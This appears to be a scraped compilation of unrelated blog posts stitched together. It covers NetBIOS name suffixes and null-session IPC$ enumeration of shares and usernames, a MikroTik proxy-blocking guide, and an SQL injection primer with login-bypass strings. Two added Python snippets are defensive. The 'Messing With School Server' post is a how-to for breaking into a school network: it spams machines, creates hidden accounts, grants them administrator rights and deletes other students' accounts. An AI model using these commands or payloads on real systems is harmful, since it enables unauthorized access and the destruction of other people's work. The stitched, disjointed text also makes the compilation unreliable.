<computername>       01      U     Messenger Service
<\\_MSBROWSE_>       01      G     Master Browser
<computername>       03      U     Messenger Service
<computername>       06      U     RAS Server Service
<computername>       1F      U     NetDDE Service
<computername>       20      U     File Server Service
<computername>       21      U     RAS Client Service
<computername>       22      U     Exchange Interchange
<computername>       23      U     Exchange Store
<computername>       24      U     Exchange Directory
<computername>       30      U     Modem Sharing Server Service
<computername>       31      U     Modem Sharing Client Service
<computername>       43      U     SMS Client Remote Control
<computername>       44      U     SMS Admin Remote Control Tool
<computername>       45      U     SMS Client Remote Chat
<computername>       46      U     SMS Client Remote Transfer
<computername>       4C      U     DEC Pathworks TCPIP Service
<computername>       52      U     DEC Pathworks TCPIP Service
<computername>       87      U     Exchange MTA
<computername>       6A      U     Exchange IMC
<computername>       BE      U     Network Monitor Agent
<computername>       BF      U     Network Monitor Apps
<username>           03      U     Messenger Service
<domain>             00      G     Domain Name
<domain>             1B      U     Domain Master Browser
<domain>             1C      G     Domain Controllers
<domain>             1D      U     Master Browser
<domain>             1E      G     Browser Service Elections
<INet~Services>      1C      G     Internet Information Server
<IS~computername>    00      U     Internet Information Server
<computername>       [2B]    U     Lotus Notes Server
IRISMULTICAST        [2F]    G     Lotus Notes
IRISNAMESERVER       [33]    G     Lotus Notes
Forte_$ND800ZA       [20]    U     DCA Irmalan Gateway Service
Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurrences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.
Group (G): A normal group; the single name may exist with many IP addresses.
Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. The maximum number of addresses is 25.
Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.
Domain Name (D): New in NT 4.0.
An intruder could use the table above and the output from an nbtstat against your machines to begin gathering information about them. With this information an intruder can tell, to an extent, what services are running on the target machine and sometimes what software packages have been installed. Traditionally, every service or major software package comes with its share of vulnerabilities, so this type of information is certainly useful to an intruder.
The next step for an intruder would be to try and list the open shares on the given computer using the net view command. Here is an example of the net view command used against my box, with the open shares C:\ and C:\MP3S\:
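As an added example (not code from the original article), here is a small Python parser that reads an nbtstat -A name table and applies the suffix table above, so an administrator can check what one of their own hosts advertises. The sample input is the article's own output plus one constructed JSMITH entry; SUFFIX_USAGE holds only a subset of the table.

```python
import re

# Added example, not from the original article: read an "nbtstat -A" name table
# and map each entry through the suffix table above to see what the host exposes.
SUFFIX_USAGE = {
    ("00", "UNIQUE"): "Workstation Service",
    ("00", "GROUP"): "Domain Name",
    ("03", "UNIQUE"): "Messenger Service (computer name or logged-on user)",
    ("1B", "UNIQUE"): "Domain Master Browser",
    ("1C", "GROUP"): "Domain Controllers",
    ("1D", "UNIQUE"): "Master Browser",
    ("1E", "GROUP"): "Browser Service Elections",
    ("1F", "UNIQUE"): "NetDDE Service",
    ("20", "UNIQUE"): "File Server Service",
}

# One registered entry: "<name>  <xx>  UNIQUE|GROUP  Registered"
ENTRY_RE = re.compile(
    r"^\s*(?P<name>.+?)\s+<(?P<suffix>[0-9A-Fa-f]{2})>\s+"
    r"(?P<type>UNIQUE|GROUP)\s+Registered\s*$")


def parse_name_table(text):
    """Return [(name, suffix, type), ...] for every registered name."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append((m.group("name").rstrip(),
                            m.group("suffix").upper(), m.group("type")))
    return entries


def summarize(entries):
    """Turn raw entries into what a defender wants to know about the host."""
    info = {"computer": None, "domain": None, "users": [], "services": [],
            "file_sharing_exposed": False}
    for name, suffix, ntype in entries:
        if (suffix, ntype) == ("00", "UNIQUE"):
            info["computer"] = name           # workstation service = host name
        elif (suffix, ntype) == ("00", "GROUP"):
            info["domain"] = name             # domain or workgroup name
        elif (suffix, ntype) == ("20", "UNIQUE"):
            info["file_sharing_exposed"] = True  # server service: shares reachable
        usage = SUFFIX_USAGE.get((suffix, ntype))
        if usage:
            info["services"].append((name, suffix, usage))
    # A <03> UNIQUE entry whose name is not the computer name is a logged-on user.
    info["users"] = [n for n, s, t in entries
                     if (s, t) == ("03", "UNIQUE") and n != info["computer"]]
    return info


# Constructed sample: the article's own nbtstat output plus one extra <03>
# user entry (JSMITH) to show how a logged-on user shows up.
SAMPLE_OUTPUT = """\
       Name               Type         Status
    ---------------------------------------------
    MR_B10NDE      <00>  UNIQUE      Registered
    WINSEKURE LABS <00>  GROUP       Registered
    MR_B10NDE      <03>  UNIQUE      Registered
    MR_B10NDE      <20>  UNIQUE      Registered
    WINSEKURE LABS <1E>  GROUP       Registered
    JSMITH         <03>  UNIQUE      Registered
"""

if __name__ == "__main__":
    for key, value in summarize(parse_name_table(SAMPLE_OUTPUT)).items():
        print(f"{key}: {value}")
```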
C:\>net view \\195.171.236.139
Shared resources at \\195.171.236.139

Sharename   Type   Comment
-----------------------------------------------------------------
C           Disk   Drive C:\
MP3S        Disk   My collection of MP3s
The command was completed successfully.
This information would give the intruder a list of shares, which he would then use in conjunction with the net use command, a command used to enable a computer to map a share to its local drive. Below is an example of how an intruder would map the C share to a local G: drive, which he could then browse:
C:\>net use G: \\195.171.236.139\C
The command was completed successfully.

C:\>G:

G:\>
However, if the intruder was targeting a large network rather than a single remote computer, the next logical step would be to glean possible usernames from the remote machine.
A network login consists of two parts, a username and a password. Once an intruder has what he knows to be a valid list of usernames, he has half of several valid logins.
Now, using the nbtstat command, the intruder can get the login name of anyone logged on locally at that machine. In the results from the nbtstat command, entries with the <03> identifier are usernames or computer names. Gleaning usernames can also be accomplished through a null IPC session and the SID tools.
The IPC$ (Inter-Process Communication) share is a standard hidden share on an NT machine which is mainly used for server to server communication. NT machines were designed to connect to each other and obtain different types of necessary information through this share. As with many design features in any operating system, intruders have learned to use this feature for their own purposes. By connecting to this share an intruder has, for all technical purposes, a valid connection to your server. By connecting to this share as null, the intruder has been able to establish this connection without providing it with credentials.
To connect to the IPC$ share as null, an intruder would issue the following command from a command prompt:
c:\>net use \\[ip address of target machine]\ipc$ "" /user:""
If the connection is successful, the intruder could do a number of things other than gleaning a user list, but let's start with that first. As mentioned earlier, this technique requires a null IPC session and the SID tools. Written by Evgenii Rudnyi, the SID tools come in two different parts, User2sid and Sid2user. User2sid will take an account name or group and give you the corresponding SID. Sid2user will take a SID and give you the name of the corresponding user or group. As stand-alone tools, this process is manual and very time consuming. Userlist.pl is a Perl script written by Mnemonix that will automate this process of SID grinding, which drastically cuts down on the time it would take an intruder to glean this information.
At this point, the intruder knows what services are running on the remote machine, which major software packages have been installed (within limits), and has a list of valid usernames and groups for that machine. Although this may seem like a ton of information for an outsider to have about your network, the null IPC session has opened other venues for information gathering. The Rhino9 team has been able to retrieve the entire native security policy for the remote machine.
Such things as account lockout, minimum password length, password age cycling and password uniqueness settings, as well as every user, the groups they belong to and the individual domain restrictions for that user, all through a null IPC session. This information gathering ability will appear in Rhino9's soon-to-be-released Leviathan tool. Some of the tools available now that can be used to gather more information via the IPC null session will be discussed below.
With the null IPC session, an intruder could also obtain a list of network shares that may not otherwise be obtainable. For obvious reasons, an intruder would like to know what network shares you have available on your machines. For this information gathering, the standard net view command is used, as follows:
c:\>net view \\[ip address of remote machine]
Depending on the security policy of the target machine, this list may or may not be denied. Take the example below (ip address has been left out for obvious reasons):
C:\>net view \\0.0.0.0
System error 5 has occurred.

Access is denied.

C:\>net use \\0.0.0.0\ipc$ "" /user:""
The command completed successfully.

C:\>net view \\0.0.0.0
Shared resources at \\0.0.0.0

Share name   Type   Used as   Comment
---------------------------------------------------------------------
Accelerator  Disk             Agent Accelerator share for Seagate backup
Inetpub      Disk
mirc         Disk
NETLOGON     Disk             Logon server share
www_pages    Disk
The command completed successfully.
As you can see, the list of shares on that server was not available until after the IPC null session had been established. At this point you may begin to realize just how dangerous this IPC connection can be, but the IPC techniques that are known to us now are actually very basic. The possibilities that are presented with the IPC share are just beginning to be explored.
Once this list of shares had been given, the intruder could then proceed to issue the net use commands as described above.

Wednesday, November 2, 2011

Messing With School Server

Sending messages out over the network

Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type

Net Send <domain> * "The server is h4x0r3d"

*Note: <domain> may not be necessary, depending on how many your school has access to. If it's just one, you can leave it out*

Where <domain> is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use

Net Send Varndean * "The server is h4x0r3d"

The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people's accounts, for example

Net Send Varndean dan,jimmy,admin "The server is h4x0r3d"

Use commas to divide the names and NO SPACES between them.


Adding/modifying user accounts

Now that you have a command prompt, you can add a new user (i.e. yourself) like so:

C:\>net user username /ADD

where username is the name of your new account. And remember, try and make it look inconspicuous, then they'll just think it's a student who really is at school, when really, the person doesn't EXIST! If you wanna have a password, use this instead:

C:\>net user username password /ADD

where password is the password you want to have. So for instance the above would create an account called 'username', with the password being 'password'. The below would have a username of 'JohnSmith' and a password of 'fruity':

C:\>net user JohnSmith fruity /ADD

Right then, now that we can create accounts, let's delete them :)

C:\>net user JohnSmith /DELETE

This will delete poor liddle JohnSmith's account. Awww. Do it to your enemies :P No, only joking, because they could have important work... well okay, only if you REALLY hate them :)

Let's give you admin privileges :)

C:\>net localgroup administrator JohnSmith /ADD

This will make JohnSmith an admin. Remember that some schools may not call their admins 'administrator' and so you need to find out the name of the local group they belong to.

You can list all the local groups by typing

C:\>net localgroup

Running .exe files you can't usually run

In the command prompt, use cd (change directory) to go to where the file is, use DIR to get the name of it, and put a shortcut of it on to a floppy. Run the program off the floppy disk.

How to Block Websites & Stop Downloading Using Proxy

This example explains how to block websites and how to stop downloads.
First, configure the proxy:

/ip proxy
set parent-proxy=0.0.0.0
set parent-proxy-port=0
set cache-administrator="webmaster"
set max-cache-size=none
set cache-on-disk=no
set max-client-connections=600
set max-server-connections=600
set max-fresh-time=3d
set always-from-cache=no
set cache-hit-dscp=4
set serialize-connections=no

Now, make it transparent:
/ip firewall nat
add chain=dstnat protocol=tcp dst-port=80 action=dst-nat to-addresses=[router ip] to-ports=8080

Make sure that your proxy is NOT an open proxy:
/ip firewall filter
add chain=input in-interface=[wan interface] src-address=0.0.0.0/0 protocol=tcp dst-port=8080 action=drop

Now for blocking websites:
/ip proxy access
add dst-host=www.vansol27.com action=deny
This will block the website http://www.vansol27.com. We can also restrict the same rule to a particular network by giving src-address; it will then block only for that source address.

We can also stop downloading of files such as .mp3, .exe, .dat, .avi, etc.:
/ip proxy access
add path=*.exe action=deny
add path=*.mp3 action=deny
add path=*.zip action=deny
add path=*.rar action=deny

Try this also:
/ip proxy access
add dst-host=:mail action=deny
This will block all websites containing the word "mail" in the URL.
Example: it will block www.hotmail.com, mail.yahoo.com, www.rediffmail.com
ENJOY BLOCKING…….

How Hackers Hack Your Website: Overview of Common Techniques

We hear the same terms bandied about whenever a popular site gets hacked. You know… SQL Injection, cross site scripting, that kind of thing. But what do these things mean? Is hacking really as inaccessible as many of us imagine — a nefarious, impossibly technical twilight world forever beyond our ken?
Not really.
When you consider that you can go to Google right now and enter a search string which will return you thousands of usernames and passwords to websites, you realize that this dark science is really no mystery at all. You'll react similarly when you see just how simple a concept SQL Injection is, and how it can be automated with simple tools. Read on, to learn the basics of how sites and web content management systems are most often hacked, and what you can do to reduce the risk of it happening to you.

SQL Injection

SQL Injection involves entering SQL code into web forms, e.g. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application.
When you enter text in the Username and Password fields of a login screen, the data you input is typically inserted into an SQL command. This command checks the data you've entered against the relevant table in the database. If your input matches table/row data, you're granted access (in the case of a login screen). If not, you're knocked back out.
The Simple SQL Injection Hack
In its simplest form, this is how the SQL Injection works. It's impossible to explain this without reverting to code for just a moment. Don't worry, it will all be over soon.
Suppose we enter the following string in a Username field:

' OR 1=1 --
The authorization SQL query that is run by the server, the command which must be satisfied to allow access, will be something along the lines of:
SELECT * FROM users WHERE username = 'USRTEXT' AND password = 'PASSTEXT'
…where USRTEXT and PASSTEXT are what the user enters in the login fields of the web form.
So entering ' OR 1=1 -- as your username could result in the following actually being run:
SELECT * FROM users WHERE username = '' OR 1=1 -- ' AND password = ''
Two things you need to know about this:
['] closes the [username] text field.
'--' is the SQL convention for commenting code, and everything after the comment is ignored. So the actual routine now becomes:
SELECT * FROM users WHERE username = '' OR 1=1
1 is always equal to 1, last time I checked. So the authorization routine is now validated, and we are ushered in the front door to wreak havoc.
Let's hope you got the gist of that, and move briskly on.
Brilliant! I'm gonna go hack me a Bank!
Slow down, cowboy. This half-cooked method won't beat the systems they have in place up at Citibank, evidently.
[Image: citibankhack.png]
But the process does serve to illustrate just what SQL Injection is all about — injecting code to manipulate a routine via a form, or indeed via the URL. In terms of login bypass via Injection, the hoary old ' OR 1=1 is just one option. If a hacker thinks a site is vulnerable, there are cheat-sheets all over the web for login strings which can gain access to weak systems. Here are a couple more common strings which are used to dupe SQL validation routines:
username field examples:
  • admin'--
  • ') or ('a'='a
  • ") or ("a"="a
  • hi" or "a"="a
… and so on.
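As an added example (not code from the original article), the login check described above is shown twice against a constructed in-memory SQLite table: once built by string concatenation, where the ' OR 1=1 -- and admin'-- strings from the text bypass the check, and once with bound parameters, where the same input is treated as data and the check fails as it should.

```python
import sqlite3

# Added example, not from the original article: the article's login query,
# built by concatenation and then parameterized, run against a constructed table.


def make_db():
    """Constructed sample users table. Passwords are stored in clear text only
    to mirror the article's query; real systems store password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "c0rrect-h0rse"), ("alice", "s3cret")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The article's query, assembled by concatenating user input into SQL.
    Returns the matched username, or None when no row matches."""
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same check with bound parameters: the input is data, never SQL text,
    so quotes and comment markers in it cannot change the query."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    for user, pw in [("alice", "s3cret"), ("' OR 1=1 --", "x"), ("admin'--", "x")]:
        print(repr(user), "-> concatenated:", login_vulnerable(conn, user, pw),
              "| parameterized:", login_safe(conn, user, pw))
```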
Backdoor Injection- Modules, Forums, Search etc.
Hacking web forms is by no means limited exclusively to login screens. A humble search form, for instance, is necessarily tied to a database, and can potentially be used to amend database details. Using SQL commands in search forms can potentially do some extremely powerful things, like calling up usernames and passwords, searching the database field set and field names, and amending same. Do people really get hacked through their search forms? You better believe it. And through forums, and anywhere else a user can input text into a field which interacts with the database. If security is low enough, the hacker can probe the database to get names of fields, then use commands like INSERT INTO, UNION, and so forth to get user information, change product prices, change account settings/balances, and just about anything else… depending on the security measures in place, database architecture and so on.
So you can have security locked down at the login, but poor security on other forms can still be exploited. Unfortunately this is a real worry regarding 3rd-party modules for web CMS products which incorporate forms; for CMS products these 3rd-party modules are often the weakest links that allow hackers access to your database.
Automated Injection
There are tools to automate the process of SQL Injection into login and other fields. One hacker process, using a specific tool, will be to seek out a number of weak targets using Google (searching for login.asp, for instance), then insert a range of possible injection strings (like those listed above, culled from innumerable Injection cheat-sheets on the Web), add a list of proxies to cover his movements, and go play XBox while the program automates the whole injection process.
Remote Injection
This involves uploading malicious files to inject SQL and exploit other vulnerabilities. It's a topic which was deemed beyond the scope of this report, but you can view this PDF if you'd like to learn more.
SQL Injection in the Browser Address Bar
Injections can also be performed via the browser address bar. I don't mean to have a pop at Microsoft, but when it comes to such vulnerabilities, HTTP GET requests with URLs of the following form are most often held to be vulnerable:
http://somesite.com/index.asp?id=10
Try adding an SQL command to the end of a URL string like this, just for kicks:
http://somesite.com/index.asp?id=10 AND id=11
See if both articles come up. Don't shoot your webmaster just yet if it's your own site and you get two articles popping up: this is real low-level access to the database. But some such sites will be vulnerable. Try adding some other simple SQL commands to the end of URLs from your own site, to see what happens.